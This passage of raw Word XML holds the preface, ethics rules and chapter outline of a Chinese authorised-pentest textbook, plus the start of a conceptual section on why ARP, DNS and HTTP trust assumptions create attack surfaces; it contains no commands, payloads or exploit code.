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网络安全从原理到靶机实战"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络安全：从原理到靶机实战</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Network Security: From Principles to Hands-on Lab — An Authorized Pentest &amp; Defense Course</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="导言把理解协议系统升级为攻防协议系统"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">导言：把”理解协议/系统”升级为”攻防协议/系统”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏《从位到物联》把读者从一个比特带到联网的嵌入式系统——OSI/TCP/IP、以太网与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP、TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机、TLS、防火墙，以及汇编/栈帧/进程/内存/系统调用。那是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">理解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议与系统。本书是它的攻防纵深：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">同一套协议与系统，从攻击者与防御者两个视角各看一遍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——每个漏洞”为什么存在、怎么利用、怎么防”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">本书的伦理底线先于一切</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：面向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权渗透测试、CTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">竞赛、安全研究与防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。全书贯穿四条不可逾越的红线——</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：凡含实操的章都放「授权与隔离声明框」，所有命令仅限读者自建隔离实验室</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方授权靶机（HackTheBox/TryHackMe/VulnHub/OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">镜像）/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">书面授权目标；实验网与生产及公网隔离；未授权访问他人系统违法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">每讲一个攻击技术，必紧跟一个「防御对照框」</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——同一漏洞蓝队如何检测与修复。这是本书的伦理底线与教学完整性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不越武器化红线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：不输出可直接打在野/真实系统的完整武器化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit；不教检测规避（AV/EDR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">bypass、反取证）；不收录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">0day；栈溢出/shellcode/提权限定在授权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">教学最小示例并必讲缓解机制（ASLR/NX/Canary/PIE）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令真实但不编造伪精度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：工具语法真实（Nmap/Burp/sqlmap/Metasploit/gdb/hashcat），但所有环境值（IP/端口/哈希/flag/CVE）用占位符并标”实际因环境而异”，绝不杜撰</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE/CVSS/flag。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">全书脊柱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是一条</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">式的渗透生命周期，五卷顺着杀伤链展开：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实验室与方法论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">侦察与网络攻防（打进去之前）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全（最大攻击面）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">系统攻防与后渗透（拿到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">之后）→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御、专题与综合（蓝队收官）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷一·实验室与方法论（第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1–3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：杀伤链与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK、搭建隔离靶场（全书实操底座）、PTES/OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法论与授权范围（RoE）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷二·侦察与网络攻防（第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4–7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：OSINT、Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描机理（回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机）、Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗/中间人（回指以太网/ARP）、网络层攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷三·Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全（第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 8–12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：HTTP/Burp/OWASP、SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入与命令注入、XSS/CSRF/SSRF、认证会话与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI/上传、进阶</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷四·系统攻防与后渗透（第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 13–18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：密码学攻击、二进制栈溢出与缓解机制、Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权、Windows/AD、Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全链路、后渗透（蓝队检测视角）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">卷五·防御、专题与综合（第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 19–22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：蓝队检测工程、加固与纵深防御、IoT/无线/云专题、综合实战</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">capstone（完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill-chain + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透报告）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">怎么读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：想最快搭起能打的环境，第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章靶场搭建是一切的前置；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">渗透速通</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">8→9→10→11；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">二进制与提权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">13→14→15→17；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队防御</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">19→20，并把前四卷每个攻击的防御对照框横向读一遍；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">全程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1→22，第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">把侦察→Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">突破→getshell→提权→后渗透串成一条完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kill-chain。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">馆内只教一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：协议与系统底座回指《从位到物联》（网络栈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch24–28、系统卷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch13–18、密码学数学</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM5、IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch29–31），本书只做”攻防”那一层，绝不重讲。每个攻击都配防御、每个环境值都是占位符、每个技术事实都标三态（①标准原理/②环境版本相关/③简化示意非武器化）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="70" w:name="卷一-实验室与方法论第-13-章"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">卷一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实验室与方法论（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1–3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="32" w:name="导引攻防对抗全景与本书定位"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">导引:攻防对抗全景与本书定位</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="攻防对抗的全景与本书在路线中的位置"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对抗的全景与本书在路线中的位置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻防对抗存在的根本原因，植根于计算机系统与网络协议在设计之初所预设的信任假设与现实威胁之间的深刻鸿沟。以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈为例，其核心设计目标是在开放互联环境下实现高效、鲁棒的数据传输，遵循“默认信任、事后问责”的端到端原则（参见《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26–27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）。ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议假设局域网内所有主机均为善意协作方，对无状态查询的应答无条件信任；DNS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将名字解析委托给分布式服务器，但原始协议缺乏数据来源验证；HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首部字段和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制依赖客户端与服务端的诚实合作，未内建强制的状态完整性保护。这些设计在当时的历史背景下是合理的——网络规模尚小，参与者多属科研机构，安全威胁不构成主要矛盾。然而，当同样的协议栈被迁移到全球公共互联网，承载金融交易、医疗数据、关键基础设施控制等敏感业务时，原本的善意假设便成为系统性的脆弱面。攻击者的出现正是利用了这种“设计假设”与“运行现实”的断层：他们可以伪造</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应答实施中间人攻击，可以劫持</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查询将用户导向钓鱼站点，可以篡改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求参数实施注入攻击——所有这些利用都只需找到一个失配点，而不需推翻整个协议体系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
